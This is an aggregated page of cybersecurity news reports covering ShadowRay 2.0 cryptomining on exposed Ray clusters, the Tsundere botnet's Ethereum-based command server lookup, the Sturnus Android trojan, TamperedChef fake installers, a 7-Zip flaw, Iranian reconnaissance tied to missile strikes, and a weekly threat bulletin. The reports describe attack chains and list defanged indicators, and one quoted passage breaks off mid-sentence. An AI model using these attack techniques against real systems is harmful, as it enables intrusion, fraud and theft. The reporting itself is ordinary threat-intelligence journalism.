2025-11-21 AI创业新闻
ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet
Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0 , is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched due to a “ long-standing design decision “ that’s consistent with Ray’s development best practices, which requires it to be run in an isolated network and act upon trusted code.
The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another. The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible.
However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations. The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts. The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said. The campaign has likely made use of large language models (LLMs) to create the GitLab payloads.
This assessment is based on the malware’s “structure, comments, and error handling patterns.” The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host. Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.
While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors and identifying which Ray dashboard IP addresses are exploitable using the open-source vulnerability detection tool interact.sh . More than 230,500 Ray servers are publicly accessible. Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default).
“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said. “This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.
The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows
Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users. Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today. There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site. The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using lures for games.
It’s possible that users searching for pirated versions of these games are the target. Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command. “The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained.
“Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.” Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies. While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself. The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by employing a smart contract . The contract was created on September 23, 2024, and has had 26 transactions to date.
Once the C2 address is retrieved, it checks to ensure it is a valid WebSocket URL, and then proceeds to establish a WebSocket connection with the specific address and receive JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period. “The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said. The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point of time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.
Exactly who is behind Tsundere is not known, but the presence of the Russian language in the source code for logging purposes alludes to a threat actor who is Russian-speaking. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024. What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team .
Another clue that points to its Russian origins is that the customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time. “Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said. Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves
This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs.
Even simple things like browser add-ons and smart home gadgets are being used to attack people. Every day, there’s a new story that shows how quickly things are changing in the fight over the internet. Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security.
Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections. All these stories remind us: the same tech that makes life better can very easily be turned into a weapon. Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.
Chinese operatives mine LinkedIn for political intel MI5 Warns of Chinese Spies Using LinkedIn to Gather Intel on Lawmakers U.K.’s domestic intelligence agency MI5 has warned lawmakers that Chinese spies are actively reaching out to “recruit and cultivate” them with lucrative job offers on LinkedIn via headhunters or cover companies. Chinese nationals are said to be using LinkedIn profiles to conduct outreach at scale, allegedly on behalf of the Chinese Ministry of State Security. “Their aim is to collect information and lay the groundwork for long-term relationships, using professional networking sites, recruitment agents and consultants acting on their behalf,” House of Commons Speaker Sir Lindsay Hoyle said . The activity is assessed to be “targeted and widespread.” Targets included parliamentary staff, economists, think tank consultants, and government officials.
In a statement shared with BBC, a spokesperson for the Chinese embassy in the UK said accusations of espionage were “pure fabrication” and accused the U.K. of a “self-staged charade.” MI5 is not the only intelligence agency to warn about social media’s potential to allow spying. In July, Mike Burgess, the Director-General of Australia’s Security Intelligence Organization (ASIO), said a foreign intelligence agency tried to find info about an Australian military project by cultivating relationships with people who worked on it. EU rewires privacy playbook E.U.
Floats Proposal for GDPR Changes The European Commission unveiled a proposal for major changes to the European Union’s General Data Protection Regulation (GDPR) and AI Act. Under the new “digital omnibus” package, the E.U. aims to simplify the General Data Protection Regulation (GDPR) and “clarify the definition of personal data” to allow companies to lawfully process personal data for AI training without prior consent from users for “legitimate interest” and as long as they do not break any laws. The move has been criticized for pandering to Big Tech’s interests.
It also amends cookie consent rules on websites, allowing users to “indicate their consent with one-click and save their cookie preferences through central settings of preferences in browsers and operating systems” instead of having to confirm their choice on every website they visit. “Taken together, these changes give both state authorities and powerful companies more room to collect and process personal information with limited oversight and reduced transparency,” the European Digital Rights (eDRI) said . “People will lose straightforward safeguards, and minoritised communities will face even higher exposure to profiling, automated decisions and intrusive monitoring.” Austrian privacy non-profit noyb said the changes “are not ‘maintaining the highest level of personal data protection,’ but massively lower protections for Europeans.” Browser add-ons turned into data siphons Malicious Browser Extensions Steal Data Threat actors are leveraging malicious VPN and ad-blocking extensions for Google Chrome and Microsoft Edge browsers to steal sensitive data. The extensions were collectively installed about 31,000 times.
The extensions, once installed, could intercept and redirect every web page visited by users, collect browsing data and a list of installed extensions, modify or disable other proxy or security tools, and route traffic through attacker-controlled servers, LayerX said . The names of some of the extensions are VPN Professional: Free Unlimited VPN Proxy, Free Unlimited VPN, VPN-free.pro - Free Unlimited VPN for Secure Browsing, Ads Blocker - Block All Ads & Protect Privacy, and Ads Cleaner for Facebook. Crypto launderer’s luxury spree unravels California Man Pleads Guilty to Laundering Crypto Stolen in $230M Scam A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency scam . Kunal Mehta (aka “Papa,” “The Accountant,” and “Shrek”) is the eighth defendant to plead guilty for his participation in this scheme following charges brought by the Department of Justice in May 2025.
The scheme used social engineering to steal hundreds of millions of dollars in cryptocurrency from victims throughout the U.S. through elaborate ruses committed online and through spoofed phone numbers between around October 2023 and March 2025, according to the U.S Justice Department. The stolen proceeds were used to purchase luxury goods, rental homes, a team of private security guards, and exotic cars. “Mehta created multiple shell companies in 2024 for the purpose of laundering funds through bank accounts created to give the appearance of legitimacy,” the DoJ said.
“To facilitate crypto-to-wire money laundering services, Mehta received stolen cryptocurrency from the group, which they had already laundered. Mehta then transferred the cryptocurrency to associates who further laundered it through sophisticated blockchain laundering techniques. The stolen funds returned to Mehta’s shell company bank accounts through incoming wire transfers from additional shell companies organized by others throughout the United States.” Mehta also personally delivered cash when requested by the members, while also performing wire transfers and facilitating exotic car purchases in exchange for a 10% fee. Critical Oracle bug opens door to full system takeover Security Flaw in Oracle Identity Manager Cybersecurity researchers have disclosed details of a critical security flaw in the Identity Manager product of Oracle Fusion Middleware ( CVE-2025-61757 , CVSS score: 9.8) that allows an unauthenticated attacker with network access via HTTP to compromise and take control of susceptible systems.
The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. “This pre-authentication RCE we found would also have been able to breach login.us2.oraclecloud.com, as it was running both OAM and OIM,” Searchlight Cyber’s Adam Kues and Shubham Shah said . “The vulnerability our team discovered follows a familiar pattern in Java: filters designed to restrict authentication often contain easy-to-exploit authentication bypass flaws. Logical flaws in how Java interprets request URIs are a gift that continues giving when paired with matrix parameters.” Oracle addressed the vulnerability last month.
Smart relay flaw triggers repeat reboots Security Flaw in Shelly Pro 4PM Smart Relay A critical security flaw in the Shelly Pro 4PM smart relay ( CVE-2025-11243 , CVSS score: 8.3) that an attacker could exploit to cause a device reboot, limiting the ability to detect abnormal power consumption or expose circuits to undesirable safety risks. “Unexpected inputs to multiple JSON-RPC methods on the Shelly Pro 4PM v1.4.4 can exhaust resources and trigger device reboots,” Nozomi Networks said . “While the issue does not enable code execution or data theft, it can be used to systematically cause repeatable outages—impacting automation routines and visibility in both home and building contexts.” Users are advised to update to version 1.6.0 and avoid direct internet exposure. Crypto mixer founders jailed for laundering millions Samourai Wallet Co-Founders Get Multi-Year Prison Term Keonne Rodriguez and William Lonergan Hill, co-founders of the crypto mixing service Samourai Wallet, were sentenced to five and four years in prison, respectively, for their role in facilitating over $237 million in illegal transactions.
Both defendants pleaded guilty to charges of knowingly transmitting criminal proceeds back in August 2025. The defendants, per U.S. prosecutors, designed Samourai around a Bitcoin mixing service known as Whirlpool and Ricochet to conceal the nature of illicit transactions. “Over $237 million of criminal proceeds laundered through Samourai came from, among other things, drug trafficking, darknet marketplaces, cyber-intrusions, frauds, sanctioned jurisdictions, murder-for-hire schemes, and a child pornography website,” the U.S.
Justice Department
said
. glob CLI flaw opens door to code injection
Security Flaw in glob CLI
A security flaw (
CVE-2025-64756
, CVSS score: 7.5) has been identified in glob CLI’s -c/–cmd flag that could result in operating system command injection, leading to remote code execution. “When glob -c
The vulnerability affects Glob versions from 10.2.0 through 11.0.3. It has been patched in versions 10.5.0, 11.1.0, and 12.0.0. According to AISLE, which discovered and reported the flaw along with Gyde04, “you are not affected if you only use glob’s library API (glob(), globSync(), async iterators) without invoking the CLI tool.” Russian cyber operative caught in Phuket Russian Hacker Wanted by U.S. Arrested in Thailand A Russian national alleged to be affiliated with the Void Blizzard (aka Laundry Bear) hacking group has been arrested in Phuket, according to CNN.
Denis Obrezko, 35, was arrested on November 6, 2025, as part of a joint operation between the U.S. Federal Bureau of Investigation (FBI) and Thai officials. He was arrested a week after entering the country on a flight to Phuket. Earlier this May, Microsoft attributed Void Blizzard to espionage operations targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America, since at least April 2024.
X debuts encrypted messaging with PIN-secured keys X Rolls Out Encrypted Chat X has revealed Chat, an encrypted upgrade to the platform’s direct messaging service with support for video and voice calls, disappearing messages, and file sharing. In an X post, the social media platform said users can block screenshots and get notified of attempts. X first began rolling out encrypted DMs in May 2023 before pausing the feature on May 29, 2025, to make some improvements. “When entering Chat for the first time, a private-public key pair is created specific to each user,” the company said .
“Users are prompted to enter a PIN (which never leaves the device), which is used to keep the private key securely stored on X’s infrastructure. This private key can then be recovered from any device if the user knows the PIN. In addition to the private-public key pairs, there is a per-conversation key that is used to encrypt the content of the messages. The private-public key pairs are used to exchange the conversation key securely between participating users.” Fake Microsoft invites fuel voice-phishing scam Phishing Campaign Uses Entra Guest User Invites for TOAD Attacks A new phishing campaign has been observed weaponizing Microsoft Entra guest user invitations to deceive recipients into making phone calls to attackers posing as Microsoft support.
The malware campaign uses Microsoft Entra tenant invitations sent from the legitimate invites@microsoft[.]com address to bypass email filters and establish trust with targets. Jabber Zeus coder extradited to face U.S. justice Ukrainian Extradited to U.S. Faces Charges in Jabber Zeus Case A Ukrainian national believed to be a developer for the Jabber Zeus cybercrime group has been reportedly extradited from Italy to the U.S.
The man, Yuriy Igorevich Rybtsov, 41, of Donetsk, is alleged to be MrICQ (aka John Doe #3), according to a report from security journalist Brian Krebs. He is accused of handling notifications of newly compromised entities, as well as of laundering the illicit proceeds from the scheme. Another member of the group, Vyacheslav “Tank” Igorevich Penchukov, pleaded guilty to his role in two different malware schemes, Zeus and IcedID, in February 2024. Later that July, he was sentenced to 18 years and ordered to pay more than $73 million in restitution to victims.
Speaking exclusively to the BBC earlier this month, the 39-year-old described himself as a “friendly guy.” At one point, he ditched cybercrime to start a company buying and selling coal, only to be lured back into it due to the allure of ransomware. In the meantime, he is also learning French and English. Penchukov also acknowledged that Russian cybercrime groups worked with security services, such as the FSB. “You can’t make friends in cybercrime, because the next day, your friends will be arrested and they will become an informant,” he was quoted as saying.
“Paranoia is a constant friend of hackers.” In a report published this month, Analyst1 researcher Anastasia Sentsova said , “the Russian state has gotten its hands dirty and set up several hacktivist groups to support its war in Ukraine.” Media Land hit with sanctions over ransomware links Russian Bulletproof Hosting Provider Media Land Sanctioned for Ransomware Ties The U.S., the U.K., and Australia have sanctioned Russian bulletproof hosting (BPH) provider Media Land and its executives , including general director Aleksandr Volosovik (aka Yalishanda), for providing services to cybercrime and ransomware groups like Evil Corp, LockBit, Black Basta, BlackSuit, and Play. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has also designated Hypercore Ltd., a front company of Aeza Group LLC (Aeza Group), along with two additional individuals and two entities that have led, materially supported, or acted for Aeza Group, including Maksim Vladimirovich Makarov, Ilya Vladislavovich Zakirov, Smart Digital Ideas DOO, and Datavice MCHJ. “These so-called bulletproof hosting service providers like Media Land provide cybercriminals essential services to aid them in attacking businesses in the United States and in allied countries,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence John K.
Hurley. In tandem, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to help internet service providers and network defenders mitigate the risks posed by BPH providers. “These providers enable malicious activities such as ransomware, phishing, malware delivery, and denial-of-service (DoS) attacks, posing an imminent and significant risk to the resilience and safety of critical systems and services,” CISA said .
Researchers reengineer PoolParty in C# Porting PoolParty from C++ to C# Cybersecurity researchers have released a C# implementation of PoolParty , a collection of process injection techniques that target Windows Thread Pools to evade endpoint detection and response (EDR) systems. PoolParty was first detailed by SafeBreach in late 2023. Its C# implementation, codenamed SharpParty by Trustwave and Stroz Friedberg, enables the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files. New macOS malware hijacks crypto apps New NovaStealer Spotted Cybersecurity researchers have detailed a new macOS stealer malware called NovaStealer that can exfiltrate wallet-related files, collect telemetry data, and replaces legit Ledger/Trezor applications with tampered copies.
“An unknown dropper fetches and runs mdriversinstall.sh, which installs a small scripts orchestrator under ~/.mdrivers and registers a LaunchAgent labeled application.com.artificialintelligence,” a security researcher who goes by the name Bruce said . “This orchestrator pulls additional scripts encoded in b64 from the C2, drops them under ~/.mdrivers/scripts, and runs them in detached screen sessions in the background. It supports updates and handles the restart of responsible screen sessions.” Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet.
The same apps and tools that make life quicker and easier can also let bad guys in. It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention. Governments try to catch hackers, and experts find secret weak spots.
But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks. I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online. Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
CTM360 Exposes a Global WhatsApp Hijacking Campaign: HackOnChat
CTM360 has identified a rapidly expanding WhatsApp account-hacking campaign targeting users worldwide via a network of deceptive authentication portals and impersonation pages. The campaign, internally dubbed HackOnChat, abuses WhatsApp’s familiar web interface, using social engineering tactics to trick users into compromising their accounts. Investigators identified thousands of malicious URLs being hosted on inexpensive top-level domains and rapidly generated through modern website-building platforms, allowing attackers to deploy new pages at scale. The campaign’s activity logs show hundreds of incidents in recent weeks, with a noticeable surge across the Middle East and Asia.
Read the full report here: https://www.ctm360.com/reports/hackonchat-unmasking-the-whatsapp-hacking-scam The hacking operations and the exploitation techniques Two techniques dominate these hacking operations. The Session Hijacking , where threat actors misuse the linked-device functionality to hijack active WhatsApp Web sessions, and Account Takeover , which involves deceiving victims into surrendering authentication keys, granting attackers full control of their accounts. Attackers push these links using templates of fake security alerts, WhatsApp Web lookalike portals, and spoofed group-invite messages. These sites are further optimized for global reach, featuring multilingual support and a country-code selector that adapts the interface for users across multiple regions.
Once scammers gain control of a WhatsApp account, they exploit it to target the victim’s contacts, often requesting money or sensitive information under the guise of a trusted source. They may also sift through messages, media, and documents to steal personal, financial, or private data, which can be used for fraud, impersonation, or extortion. Frequently, these attacks extend further as the compromised account is used to send phishing messages to the victim’s contacts, creating a chain of attacks that spreads the scam. HackOnChat demonstrates that social engineering remains one of the most scalable attack vectors today, especially when attackers exploit trusted and familiar interfaces and the human trust built around them.
Read the full report here and explore all of CTM360’s latest insights and threat intelligence. Learn more at www.ctm360.com Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
New Sturnus Android Trojan Quietly Captures Encrypted Chats and Hijacks Devices
Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud. “A key differentiator is its ability to bypass encrypted messaging,” ThreatFabric said in a report shared with The Hacker News. “By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.” Another notable feature is its ability to stage overlay attacks by serving fake login screens atop banking apps to capture victims’ credentials. According to the Dutch mobile security company, Sturnus is privately operated and is currently assessed to be in the evaluation stage.
Artifacts distributing the banking malware are listed below - Google Chrome (“com.klivkfbky.izaybebnx”) Preemix Box (“com.uvxuthoq.noscjahae”) The malware has been designed to specifically single out financial institutions across Southern and Central Europe with region-specific overlays. The name Sturnus is a nod to its use of a mixed communication pattern blending plaintext, AES, and RSA, with ThreatFabric likening it to the European starling (binomial name: Sturnus vulgaris), which incorporates a variety of whistles and is known to be a vocal mimic. The trojan, once launched, contacts a remote server over WebSocket and HTTP channels to register the device and receive encrypted payloads in return. It also establishes a WebSocket channel to allow the threat actors to interact with the compromised Android device during Virtual Network Computing (VNC) sessions.
Besides serving fake overlays for banking apps, Sturnus is also capable of abusing Android’s accessibility services to capture keystrokes and record user interface (UI) interactions. As soon as an overlay for a bank is served to the victim and the credentials are harvested, the overlay for that specific target is disabled so as not to arouse the user’s suspicion. Furthermore, it can display a full-screen overlay that blocks all visual feedback and mimics the Android operating system update screen to give the impression to the user that software updates are in progress, when, in reality, it allows malicious actions to be carried out in the background. Some of the malware’s other features include support for monitoring device activity, as well as leveraging accessibility services to gather chat contents from Signal, Telegram, and WhatsApp when they are opened by the victim, and send details about every visible interface element on the screen.
This allows the attackers to reconstruct the layout at their end and remotely issue actions related to clicks, text input, scrolling, app launches, permission confirmations, and even enable a black screen overlay. An alternate remote control mechanism packed into Sturnus uses the system’s display-capture framework to mirror the device screen in real-time. “Whenever the user navigates to settings screens that could disable its administrator status, the malware detects the attempt through accessibility monitoring, identifies relevant controls, and automatically navigates away from the page to interrupt the user,” ThreatFabric said. “Until its administrator rights are manually revoked, both ordinary uninstallation and removal through tools like ADB are blocked, giving the malware strong protection against cleanup attempts.” The extensive environment monitoring capabilities make it possible to collect sensor information, network conditions, hardware data, and an inventory of installed apps.
This device profile serves as a continuous feedback loop, helping attackers adapt their tactics to sidestep detection. “Although the spread remains limited at this stage, the combination of targeted geography and high-value application focus implies that the attackers are refining their tooling ahead of broader or more coordinated operations,” ThreatFabric said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Iran-Linked Hackers Mapped Ship AIS Data Days Before Real-World Missile Strike Attempt
Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic targeting. The development is a sign that the lines between state-sponsored cyber attacks and kinetic warfare are increasingly blurring, necessitating the need for a new category of warfare, the tech giant’s threat intelligence team said in a report shared with The Hacker News. While traditional cybersecurity frameworks have treated digital and physical threats as separate domains, CJ Moses, CISO of Amazon Integrated Security, said these delineations are artificial and that nation-state threat actors are engaging in cyber reconnaissance activity to enable kinetic targeting. “These aren’t just cyber attacks that happen to cause physical damage; they are coordinated campaigns where digital operations are specifically designed to support physical military objectives,” Moses added.
As an example, Amazon said it observed Imperial Kitten (aka Tortoiseshell), a hacking group assessed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), conducting digital reconnaissance between December 2021 and January 2024, targeting a ship’s Automatic Identification System (AIS) platform with the goal of gaining access to critical shipping infrastructure. Subsequently, the threat actor was identified as attacking additional maritime vessel platforms, in one case even gaining access to CCTV cameras fitted on a maritime vessel that provided real-time visual intelligence. The attack progressed to a targeted intelligence gathering phase on January 27, 2024, when Imperial Kitten carried out targeted searches for AIS location data for a specific shipping vessel. Merely days later, that same vessel was targeted by an unsuccessful missile strike carried out by Iranian-backed Houthi militants .
The Houthi forces have been attributed to a string of missile attacks targeting commercial shipping in the Red Sea in support of the Palestinian militant group Hamas in its war with Israel. On February 1, 2024, the Houthi movement in Yemen claimed it had struck a U.S. merchant ship named KOI with “several appropriate naval missiles.” “This case demonstrates how cyber operations can provide adversaries with the precise intelligence needed to conduct targeted physical attacks against maritime infrastructure – a critical component of global commerce and military logistics,” Moses said. Another case study concerns MuddyWater, a threat actor linked to Iran’s Ministry of Intelligence and Security (MOIS), that established infrastructure for a cyber network operation in May 2025, and later used that server a month later to access another compromised server containing live CCTV streams from Jerusalem to gather real-time visual intelligence of potential targets.
On June 23, 2025, around the time Iran launched widespread missile attacks against the city, the Israel National Cyber Directorate disclosed that “Iranians have been trying to connect to cameras to understand what happened and where their missiles hit to improve their precision.” To pull off these multi-layered attacks, the threat actors are said to have routed their traffic through anonymizing VPN services to obscure their true origins and complicate attribution efforts. The findings serve to highlight that espionage-focused attacks can ultimately be a launchpad for kinetic targeting. “Nation-state actors are recognizing the force multiplier effect of combining digital reconnaissance with physical attacks,” Amazon said. “This trend represents a fundamental evolution in warfare, where the traditional boundaries between cyber and kinetic operations are dissolving.” Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
TamperedChef Malware Spreads via Fake Software Installers in Ongoing Global Campaign
Threat actors are leveraging bogus installers masquerading as popular software to trick users into installing malware as part of a global malvertising campaign dubbed TamperedChef . The end goal of the attacks is to establish persistence and deliver JavaScript malware that facilitates remote access and control, per a new report from Acronis Threat Research Unit (TRU). The campaign , per the Singapore-headquartered company, is still ongoing, with new artifacts being detected and associated infrastructure remaining active. “The operator(s) rely on social engineering by using everyday application names, malvertising, Search Engine Optimization (SEO), and abused digital certificates that aim to increase user trust and evade security detection,” researchers Darrel Virtusio and Jozsef Gegeny said.
TamperedChef is the name assigned to a long-running campaign that has leveraged seemingly legitimate installers for various utilities to distribute an information stealer malware of the same name. It’s assessed to be part of a broader set of attacks codenamed EvilAI that uses lures related to artificial intelligence (AI) tools and software for malware propagation. To lend these counterfeit apps a veneer of legitimacy, the attackers use code-signing certificates issued for shell companies registered in the U.S., Panama, and Malaysia to sign them, and acquire new ones under a different company name as older certificates are revoked. Acronis described the infrastructure as “industrialized and business-like,” effectively allowing the operators to steadily churn out new certificates and exploit the inherent trust associated with signed applications to disguise the malicious software as legitimate.
It’s worth noting at this stage that the malware tracked as TamperedChef by Truesec and G DATA is also referred to as BaoLoader by Expel, and is different from the original TamperedChef malware that was embedded within a malicious recipe application distributed as part of the EvilAI campaign. Acronis told The Hacker News that it’s using TamperedChef to refer to the malware family, since it has already been widely adopted by the cybersecurity community. “This helps avoid confusion and stay consistent with existing publications and detection names used by other vendors, which also refer to the malware family as TamperedChef,” it said. A typical attack plays out as follows: Users who search for PDF editors or product manuals on search engines like Bing are served malicious ads or poisoned URLs, when clicked, take users to booby-trapped domains registered on NameCheap that deceive them into downloading the installers.
Once executing the installer, users are prompted to agree to the program’s licensing terms. It then launches a new browser tab to display a thank you message as soon as the installation is complete in order to keep up the ruse. However, in the background, an XML file is dropped to create a scheduled task that’s designed to launch an obfuscated JavaScript backdoor. The backdoor, in turn, connects to an external server and sends basic information, such as session ID, machine ID, and other metadata in the form of a JSON string that’s encrypted and Base64-encoded over HTTPS.
That being said, the end goals of the campaign remain nebulous. Some iterations have been found to facilitate advertising fraud, indicating their financial motives. It’s also possible that the threat actors are looking to monetize their access to other cybercriminals, or harvest sensitive data and sell it in underground forums to enable fraud. Telemetry data shows that a significant concentration of infections has been identified in the U.S., and to a lesser extent in Israel, Spain, Germany, India, and Ireland.
Healthcare, construction, and manufacturing are the most affected sectors. “These industries appear especially vulnerable to this type of campaign, likely due to their reliance on highly specialized and technical equipment, which often prompts users to search online for product manuals – one of the behaviors exploited by the TamperedChef campaign,” the researchers noted. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Hackers Actively Exploiting 7-Zip Symbolic Link–Based RCE Vulnerability (CVE-2025-11001)
A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday. The vulnerability in question is CVE-2025-11001 (CVSS score: 7.0), which allows remote attackers to execute arbitrary code. It has been addressed in 7-Zip version 25.00 released in July 2025.
“The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories,” Trend Micro’s Zero Day Initiative (ZDI) said in an alert released last month. “An attacker can leverage this vulnerability to execute code in the context of a service account.” Ryota Shiga of GMO Flatt Security Inc., along with the company’s artificial intelligence (AI)-powered AppSec Auditor Takumi , has been credited with discovering and reporting the vulnerability. It’s worth noting that 7-Zip 25.00 also resolves another flaw, CVE-2025-11002 (CVSS score: 7.0), that allows for remote code execution by taking advantage of improper handling of symbolic links within ZIP archives, resulting in directory traversal.
Both shortcomings were introduced in version 21.02. “Active exploitation of CVE-2025-11001 has been observed in the wild,” NHS England Digital said . However, there are currently no details available on how it’s being weaponized, by whom, and in what context. Given that there exists proof-of-concept ( PoC ) exploits, it’s essential that 7-Zip users move quickly to apply the necessary fixes as soon as possible, if not already, for optimal protection.
“This vulnerability can only be exploited from the context of an elevated user / service account or a machine with developer mode enabled,” security researcher Dominik (aka pacbypass), who released the PoC, said in a post detailing the flaw. “This vulnerability can only be exploited on Windows.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices
